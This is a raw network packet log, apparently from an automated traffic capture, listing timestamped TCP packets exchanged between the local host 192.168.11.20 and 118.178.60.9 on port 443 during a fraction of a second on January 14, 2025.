                                                                        Jan 14, 2025 05:12:37.127360106 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.128364086 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.128705025 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.128705025 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.128705025 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.131175041 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.131381035 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.131381035 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.131557941 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.133733034 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.133907080 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.133907080 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.134114027 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.134531021 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.134707928 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.134708881 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.134991884 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.135802984 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.135993004 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.135993004 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.136277914 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.138017893 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.138180971 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.138181925 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.138398886 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.139034986 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.139367104 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.139367104 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.139422894 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.141119957 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.141318083 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.141318083 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.141494989 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.142210007 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.142379999 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.142561913 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.143026114 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.143225908 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.143225908 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.143409967 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.145427942 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.145627975 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.145812988 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.146362066 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.146724939 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.148528099 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.148751020 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.149529934 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.149794102 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.149794102 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.149794102 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.150522947 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.150686979 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.150686979 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.150897980 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.152648926 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.152858019 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.152858019 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.153040886 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.154026985 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.154196978 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.154407978 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.154407978 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.155767918 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.156008005 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.156008005 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.156785011 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.156925917 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.156925917 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.157160997 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.157964945 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.158207893 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.158207893 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.159691095 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.159874916 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.159874916 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.160064936 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.161663055 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.161895990 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.162730932 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.162993908 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.162993908 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.162993908 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.163748980 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.163947105 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.163947105 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.164129972 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.165824890 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.165992022 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.165992022 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.166196108 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.166773081 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.166928053 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.166928053 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.167118073 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.168853998 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.169151068 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.170038939 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.170268059 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.170268059 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.170295000 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.170995951 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.171175003 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.171175003 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.171361923 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.172840118 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.173027039 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.173027039 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.173208952 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.173814058 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.173973083 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.174154043 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.175856113 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.176012993 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.176012993 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.176227093 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.176989079 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.177243948 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.178035975 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.178263903 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.178263903 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.178263903 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.180007935 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.180160046 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.180373907 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.180373907 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.180836916 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.181037903 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.181037903 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.181217909 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.182687044 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.182878971 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.182878971 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.183063030 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.184065104 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.184243917 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.184243917 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.184397936 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.185980082 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.186139107 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.186139107 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.186327934 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.186768055 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.186991930 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.187715054 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.187947035 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.189646006 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.189896107 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.189896107 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.189896107 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.190764904 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.190994024 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.192540884 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.192780972 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.192780972 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.192814112 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.193561077 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.193789959 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.194581032 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.194813967 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.194813967 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.194848061 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.196346998 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.196577072 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.197570086 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.197802067 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.199274063 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.199451923 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.199451923 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.199625969 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.200383902 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.200668097 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.201119900 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.201344967 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.202959061 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.203190088 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.203190088 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.204221964 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.204449892 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.205852985 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.206084967 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.206084967 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.206084967 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.206969976 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.207207918 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.207978964 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.208210945 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.208210945 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.209703922 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.209963083 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.210149050 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.211529970 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.211702108 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.211702108 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.211874962 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.212363958 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.212518930 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.212518930 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.212703943 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.213706017 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.213871002 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.213871956 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.214049101 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.215171099 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.215341091 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.215341091 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.215526104 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.216236115 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.216397047 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.216397047 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.216578007 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.217890024 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.218139887 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.218869925 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.219090939 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.219867945 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.220096111 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.220096111 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.220096111 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.221776962 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.221959114 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.221959114 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.222856998 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.223140955 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.224412918 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.224684000 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.225239992 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.225461960 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.225461960 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.225461960 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.226388931 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.226542950 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.226739883 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.227917910 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.228142023 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.229902983 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.230123997 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.230123997 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.230123997 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.230609894 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.230783939 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.230783939 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.230962038 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.231502056 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.231709003 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.231709957 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.233424902 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.233582020 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.233757019 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.233757019 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.234273911 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.234447956 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.234627962 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.235932112 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.236084938 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.236085892 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.236264944 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.237024069 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.237281084 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.237901926 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.238126993 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.238126993 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.238126993 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.239562988 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.239778042 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.240420103 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.240643978 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.240712881 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.242260933 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.242417097 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.242417097 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.242595911 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.243145943 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.243299961 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.243480921 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.243482113 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.244132996 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.244290113 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.244290113 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.244474888 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.245131016 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.245258093 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.245481014 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.245481014 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.245513916 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.245853901 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.247031927 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.247231960 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.247231960 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.247462988 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.248070002 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.248239994 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.248421907 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.248862028 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.249022007 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.249022007 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.249202013 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.250646114 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.250804901 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.250804901 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.250982046 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.251404047 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.251558065 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.251558065 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.251738071 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.253072977 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.253245115 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.253323078 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.254231930 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.254373074 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.254553080 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.254939079 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.255156040 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.256700039 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.256925106 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.256925106 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.256926060 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.257576942 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.257744074 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.257744074 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.257925034 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.259264946 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.259524107 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.259959936 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.260183096 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.260220051 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.261317015 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.261487961 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.261487961 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.262671947 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.262840986 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.262841940 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.263020992 CET49766443192.168.11.20118.178.60.9
